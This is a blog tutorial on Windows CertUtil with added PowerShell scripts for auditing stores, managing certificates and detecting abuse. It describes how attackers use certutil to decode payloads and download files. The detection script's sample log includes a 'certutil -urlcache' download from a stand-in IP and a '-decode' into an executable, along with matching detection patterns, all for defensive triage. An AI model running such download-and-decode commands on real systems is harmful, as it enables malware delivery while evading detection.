21 December, 2022

Unlocking the Power of Certutil

CertUtil is a command-line tool available on Windows operating systems that allows users to manage certificates and certificate revocation lists (CRLs). It is a powerful tool that enables administrators to perform various tasks, including viewing certificates, verifying digital signatures, and managing certificate stores.

In this blog, we’ll take a closer look at CertUtil and explore its features and functionalities.

Viewing Certificates

One of the primary functions of CertUtil is to view certificates. You can use the tool to view the details of a specific certificate or a list of all certificates in a certificate store. To view a specific certificate, you can use the following command:

certutil -view -restrict "SerialNumber=<serialnumber>"

In the above command, replace <serialnumber> with the serial number of the certificate you want to view. Note that -view queries a certification authority's database, so it is run on a CA server (or, with -config, against one). The command displays the details of the specified certificate, including its subject, issuer, and expiration date.

To view all certificates in a certificate store, you can use the following command:

certutil -store <storename>

In the above command, replace <storename> with the name of the certificate store you want to view, such as My or Root. By default this reads the local machine's store; add -user to read the current user's store instead. The command displays a list of all certificates in the specified store.
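The text that certutil -store prints is meant for people, not scripts. The following PowerShell is an added example (not code from the original post) that parses that output into objects so a store can be audited for expired entries or for certificates in the Root store that are not self-signed. It assumes certutil's English field labels ("Serial Number:", "Issuer:", "Subject:", "NotAfter:", "Cert Hash(sha1):"); the sample output embedded below is constructed so the parser runs offline, and Get-CertUtilStore runs the real command.

```powershell
# Added example, not from the original post: parse "certutil -store <storename>"
# output into objects. Assumes the English field labels certutil prints.

function ConvertFrom-CertUtilStore {
    param([Parameter(Mandatory)][string[]]$Lines)

    $certs   = New-Object System.Collections.Generic.List[object]
    $current = $null
    foreach ($line in $Lines) {
        switch -Regex ($line) {
            '^=+ Certificate (\d+) =+$' {
                # A new "==== Certificate N ====" banner starts the next record.
                if ($current) { $certs.Add([pscustomobject]$current) }
                $current = [ordered]@{ Index = [int]$Matches[1]; SerialNumber = $null; Subject = $null
                                       Issuer = $null; NotAfter = $null; Thumbprint = $null }
                break
            }
            '^\s*Serial Number:\s*(\S+)'     { if ($current) { $current.SerialNumber = $Matches[1] }; break }
            '^\s*Issuer:\s*(.+)$'            { if ($current) { $current.Issuer  = $Matches[1].Trim() }; break }
            '^\s*Subject:\s*(.+)$'           { if ($current) { $current.Subject = $Matches[1].Trim() }; break }
            '^\s*NotAfter:\s*(.+)$' {
                # Keep the raw text if the date does not parse under the current culture.
                $d = [datetime]::MinValue
                $value = if ([datetime]::TryParse($Matches[1].Trim(), [ref]$d)) { $d } else { $Matches[1].Trim() }
                if ($current) { $current.NotAfter = $value }
                break
            }
            '^\s*Cert Hash\(sha1\):\s*(\S+)' { if ($current) { $current.Thumbprint = $Matches[1] }; break }
        }
    }
    if ($current) { $certs.Add([pscustomobject]$current) }
    return $certs
}

function Get-CertUtilStore {
    # Live run against a real store (local machine store unless -user is added).
    param([string]$StoreName = 'Root')
    $raw = & certutil.exe -store $StoreName 2>&1 | ForEach-Object { "$_" }
    ConvertFrom-CertUtilStore -Lines $raw
}

# Constructed sample of certutil -store output (not captured from a real machine).
$sample = @'
Root "Trusted Root Certification Authorities"
================ Certificate 0 ================
Serial Number: 00a1b2c3d4e5f60718
Issuer: CN=Example Root CA, O=Example Corp
 NotBefore: 1/1/2020 12:00 AM
 NotAfter: 1/1/2023 12:00 AM
Subject: CN=Example Root CA, O=Example Corp
Signature matches Public Key
Root Certificate: Subject matches Issuer
Cert Hash(sha1): 0123456789abcdef0123456789abcdef01234567
================ Certificate 1 ================
Serial Number: 0f0e0d0c0b0a0908
Issuer: CN=Example Root CA, O=Example Corp
 NotBefore: 1/1/2022 12:00 AM
 NotAfter: 1/1/2040 12:00 AM
Subject: CN=Unexpected Intermediate, O=Constructed Sample
Cert Hash(sha1): 89abcdef0123456789abcdef0123456789abcdef
CertUtil: -store command completed successfully.
'@ -split "`r?`n"

$parsed = ConvertFrom-CertUtilStore -Lines $sample
$parsed | Format-Table Index, SerialNumber, Subject, NotAfter, Thumbprint -AutoSize

# Audit 1: anything already expired.
$parsed | Where-Object { $_.NotAfter -is [datetime] -and $_.NotAfter -lt (Get-Date) } |
    ForEach-Object { "EXPIRED: $($_.Subject) (serial $($_.SerialNumber))" }

# Audit 2: a Root store should hold self-signed certificates only; anything else deserves a look.
$parsed | Where-Object { $_.Subject -ne $_.Issuer } |
    ForEach-Object { "NOT SELF-SIGNED IN ROOT STORE: $($_.Subject) issued by $($_.Issuer)" }
```

Replace the constructed sample with Get-CertUtilStore -StoreName Root to run the same two audits against a live machine; the second audit is the one that catches a certificate that was dropped into the Root store by something other than the platform's own root program.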

Verifying Digital Signatures

Another important feature of CertUtil is its ability to verify digital signatures. You can use the tool to verify the digital signature of a file or to verify the digital signature of a certificate. To verify the digital signature of a file, you can use the following command:

certutil -verify <filename>

In the above command, replace <filename> with the name of the file you want to verify. This command will display the result of the verification process, indicating whether the digital signature is valid or invalid.

To verify the digital signature of a certificate, you can use the following command:

certutil -verify -urlfetch <certfilename>

In the above command, replace <certfilename> with the name of the certificate file you want to verify. This command verifies the digital signature of the specified certificate and, because of -urlfetch, also checks its revocation status by fetching the CRL, OCSP and AIA URLs listed in the certificate (so it needs network access).

Managing Certificate Stores

CertUtil also allows users to manage certificate stores. You can use the tool to add or remove certificates from a certificate store or to export a certificate to a file. To add a certificate to a store, you can use the following command:

certutil -addstore <storename> <filename>

In the above command, replace <storename> with the name of the store you want to add the certificate to, such as My or Root, and replace <filename> with the path of the certificate file you want to add.

Finally, to export a certificate to a file, you can use the following command:

certutil -store <storename> <serialnumber> <filename>

In the above command, the -store verb with a third argument writes the matching certificate to a file. Replace <storename> with the name of the store that contains the certificate, replace <serialnumber> with the serial number of the certificate you want to export, and replace <filename> with the name of the file you want to export the certificate to.
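The verification and store-management sections above describe single commands; in practice they are run as a sequence. The following PowerShell is an added example (not code from the original post) that adds a certificate file to a store, confirms it landed, verifies it with -urlfetch, exports it by serial number, and removes it again with -delstore. The file paths and store name are placeholders to replace, and every certutil call uses -user so it operates on the current user's store and does not need elevation.

```powershell
# Added example, not from the original post: add / confirm / verify / export / remove
# a certificate using the commands described above. Paths below are placeholders.
param(
    [string]$StoreName = 'My',
    [string]$CertFile  = 'C:\certs\example.cer',    # placeholder: an existing .cer file
    [string]$ExportTo  = 'C:\certs\exported.cer'    # placeholder: where to write the export
)

function Invoke-CertUtil {
    # Runs certutil.exe and returns the exit code together with its combined output.
    param([string[]]$Arguments)
    $output = & certutil.exe @Arguments 2>&1 | ForEach-Object { "$_" }
    [pscustomobject]@{ ExitCode = $LASTEXITCODE; Output = ($output -join "`n") }
}

# Read the serial number and thumbprint from the file with .NET so the later
# steps can address the certificate the way certutil expects (hex serial number).
$cert   = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 -ArgumentList $CertFile
$serial = $cert.SerialNumber
"Certificate: $($cert.Subject)  serial=$serial  thumbprint=$($cert.Thumbprint)"

# 1. Add the file to the store (certutil -addstore <storename> <filename>).
$r = Invoke-CertUtil @('-user', '-addstore', $StoreName, $CertFile)
if ($r.ExitCode -ne 0) { throw "addstore failed (exit $($r.ExitCode)):`n$($r.Output)" }

# 2. Confirm it is present, independently of certutil, through the Cert: drive.
$inStore = Get-ChildItem "Cert:\CurrentUser\$StoreName" | Where-Object Thumbprint -eq $cert.Thumbprint
if (-not $inStore) { throw "certificate not found in CurrentUser\$StoreName after addstore" }

# 3. Verify the chain and revocation status (certutil -verify -urlfetch <certfilename>).
#    -urlfetch downloads the CRL/OCSP/AIA URLs named in the certificate, so this needs network access.
$v = Invoke-CertUtil @('-verify', '-urlfetch', $CertFile)
"verify exit code: $($v.ExitCode) (0 = chain built and revocation check passed)"
$v.Output -split "`n" | Where-Object { $_ -match 'revocation|REVOKED|expired|Leaf certificate' }

# 4. Export the certificate from the store by serial number
#    (certutil -store <storename> <serialnumber> <filename>).
$e = Invoke-CertUtil @('-user', '-store', $StoreName, $serial, $ExportTo)
if ($e.ExitCode -ne 0) { throw "export failed (exit $($e.ExitCode)):`n$($e.Output)" }
"exported to $ExportTo"

# 5. Remove it again (certutil -delstore <storename> <serialnumber>).
$d = Invoke-CertUtil @('-user', '-delstore', $StoreName, $serial)
if ($d.ExitCode -ne 0) { throw "delstore failed (exit $($d.ExitCode)):`n$($d.Output)" }
"removed serial $serial from CurrentUser\$StoreName"
```

Checking the exit code after every call matters because certutil prints a success banner for the verb even when the certificate did not match anything, and step 2 is there to prove the add took effect with a source other than certutil itself. Drop -user to work on the local machine store, which requires an elevated prompt.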

CertUtil in MITRE ATT&CK:

APT groups that MITRE ATT&CK lists as using CertUtil (ATT&CK group IDs):

  • G0075 — Rancor
  • G0045 — menuPass
  • G0007 — APT28
  • G0049 — OilRig
  • G0010 — Turla

How attackers use certutil.exe:

According to a Malwarebytes report on an attack against the Saudi Arabian government, the payload was embedded in a macro as Base64 code, and the macro used the certutil program to decode the Base64 into a PE file. The Retefe Trojan writes its root certificate to disk and then uses the -addstore command shown above to install it on the system. Certutil.exe has also been used to download and decode remote files, and Sofacy has used CertUtil in attacks against multiple government entities. More generally, attackers can use CertUtil to encode or decode malicious payloads while avoiding detection.

FireEye Threat research report: CertUtil Qualms: They Came to Drop FOMBs

Detecting CertUtil abuse:

  • Monitor for certutil.exe creating new files on disk.
  • Monitor outbound requests carrying the user agent Microsoft-CryptoAPI/10.0.
  • Monitor outbound requests carrying the user agent CertUtil URL Agent.
  • Monitor process creation events for certutil.exe, including the command line.
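The four detection points above can be expressed as a small triage script. The following PowerShell is an added example (not code from the original post) that runs them over constructed sample log lines in a simplified key=value form; the parser is meant to be swapped for your own Sysmon, 4688 or proxy export. Process creations are rated High only when the command line carries one of the -urlcache, -decode or -encode switches mentioned in the text, files written with executable extensions are rated High, and Microsoft-CryptoAPI/10.0 is rated Low on the assumption that legitimate CRL and OCSP fetches use the same agent and would otherwise drown the alert.

```powershell
# Added example, not from the original post: apply the detection points above
# to constructed sample log lines. Adapt ConvertFrom-KeyValueLine to your own log format.

function ConvertFrom-KeyValueLine {
    # Parses 'Key=value Key2="value with spaces"' into a hashtable.
    param([string]$Line)
    $h = @{}
    foreach ($m in [regex]::Matches($Line, '(\w+)=(?:"([^"]*)"|(\S+))')) {
        $value = if ($m.Groups[2].Success) { $m.Groups[2].Value } else { $m.Groups[3].Value }
        $h[$m.Groups[1].Value] = $value
    }
    $h
}

function New-Alert {
    param([string]$Severity, [string]$Reason, [string]$Who, [string]$Detail)
    [pscustomobject]@{ Severity = $Severity; Reason = $Reason; Who = $Who; Detail = $Detail }
}

function Test-CertUtilEvent {
    # Process-creation and file-creation events where the acting image is certutil.exe.
    param([hashtable]$E)
    if ($E.Image -notmatch '\\certutil\.exe$') { return }

    switch ($E.EventType) {
        'ProcessCreate' {
            # Switches may be written -decode or /decode; match either prefix.
            $sw = [regex]::Matches($E.CommandLine, '(?i)[-/](urlcache|decode|encode)\b') |
                  ForEach-Object { $_.Groups[1].Value.ToLower() }
            if ($sw) { New-Alert High ("certutil.exe run with " + ($sw -join ',')) $E.User $E.CommandLine }
            else     { New-Alert Low  'certutil.exe process creation' $E.User $E.CommandLine }
        }
        'FileCreate' {
            $sev = if ($E.TargetFilename -match '\.(exe|dll|ps1|bat|vbs|js)$') { 'High' } else { 'Medium' }
            New-Alert $sev 'certutil.exe wrote a file' $E.User $E.TargetFilename
        }
    }
}

function Test-ProxyEvent {
    # Web proxy events: key on the two user agents named in the detection list.
    param([hashtable]$E)
    if ($E.UserAgent -eq 'CertUtil URL Agent') {
        New-Alert High 'CertUtil URL Agent user agent' $E.SrcIp $E.Url
    } elseif ($E.UserAgent -like 'Microsoft-CryptoAPI/*') {
        # Assumed noisy: Windows uses this agent for ordinary CRL/OCSP/AIA fetches, so review destinations rather than page.
        New-Alert Low 'Microsoft-CryptoAPI user agent' $E.SrcIp $E.Url
    }
}

# Constructed sample lines (not real telemetry); 203.0.113.5 is a documentation address.
$sample = @(
    'EventType=ProcessCreate Image=C:\Windows\System32\certutil.exe CommandLine="certutil -user -store My" User=CORP\admin',
    'EventType=ProcessCreate Image=C:\Windows\System32\certutil.exe CommandLine="certutil -urlcache -f http://203.0.113.5/a.txt C:\Users\Public\a.txt" User=CORP\jdoe',
    'EventType=ProcessCreate Image=C:\Windows\System32\certutil.exe CommandLine="certutil -decode C:\Users\Public\a.txt C:\Users\Public\a.exe" User=CORP\jdoe',
    'EventType=FileCreate Image=C:\Windows\System32\certutil.exe TargetFilename=C:\Users\Public\a.exe User=CORP\jdoe',
    'EventType=Proxy SrcIp=10.0.0.7 UserAgent="CertUtil URL Agent" Url=http://203.0.113.5/a.txt',
    'EventType=Proxy SrcIp=10.0.0.7 UserAgent="Microsoft-CryptoAPI/10.0" Url=http://crl.example.invalid/root.crl',
    'EventType=ProcessCreate Image=C:\Windows\System32\cmd.exe CommandLine="cmd /c dir" User=CORP\jdoe'
)

$alerts = foreach ($line in $sample) {
    $e = ConvertFrom-KeyValueLine $line
    if ($e.EventType -eq 'Proxy') { Test-ProxyEvent $e } else { Test-CertUtilEvent $e }
}

$order = @{ High = 0; Medium = 1; Low = 2 }
$alerts | Sort-Object { $order[$_.Severity] } | Format-Table Severity, Reason, Who, Detail -AutoSize
```

On the sample, the -store invocation by the administrator and the CryptoAPI CRL fetch come out Low, while the -urlcache download, the -decode run, the resulting .exe write and the CertUtil URL Agent request all come out High for the same user and address, which is the correlation an analyst wants to see in one view rather than as four separate rule hits.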

Conclusion

CertUtil is a very powerful tool that allows administrators to manage certificates and certificate stores on Windows operating systems. It provides a range of features and functionalities, including the ability to view certificates, verify digital signatures, and manage.
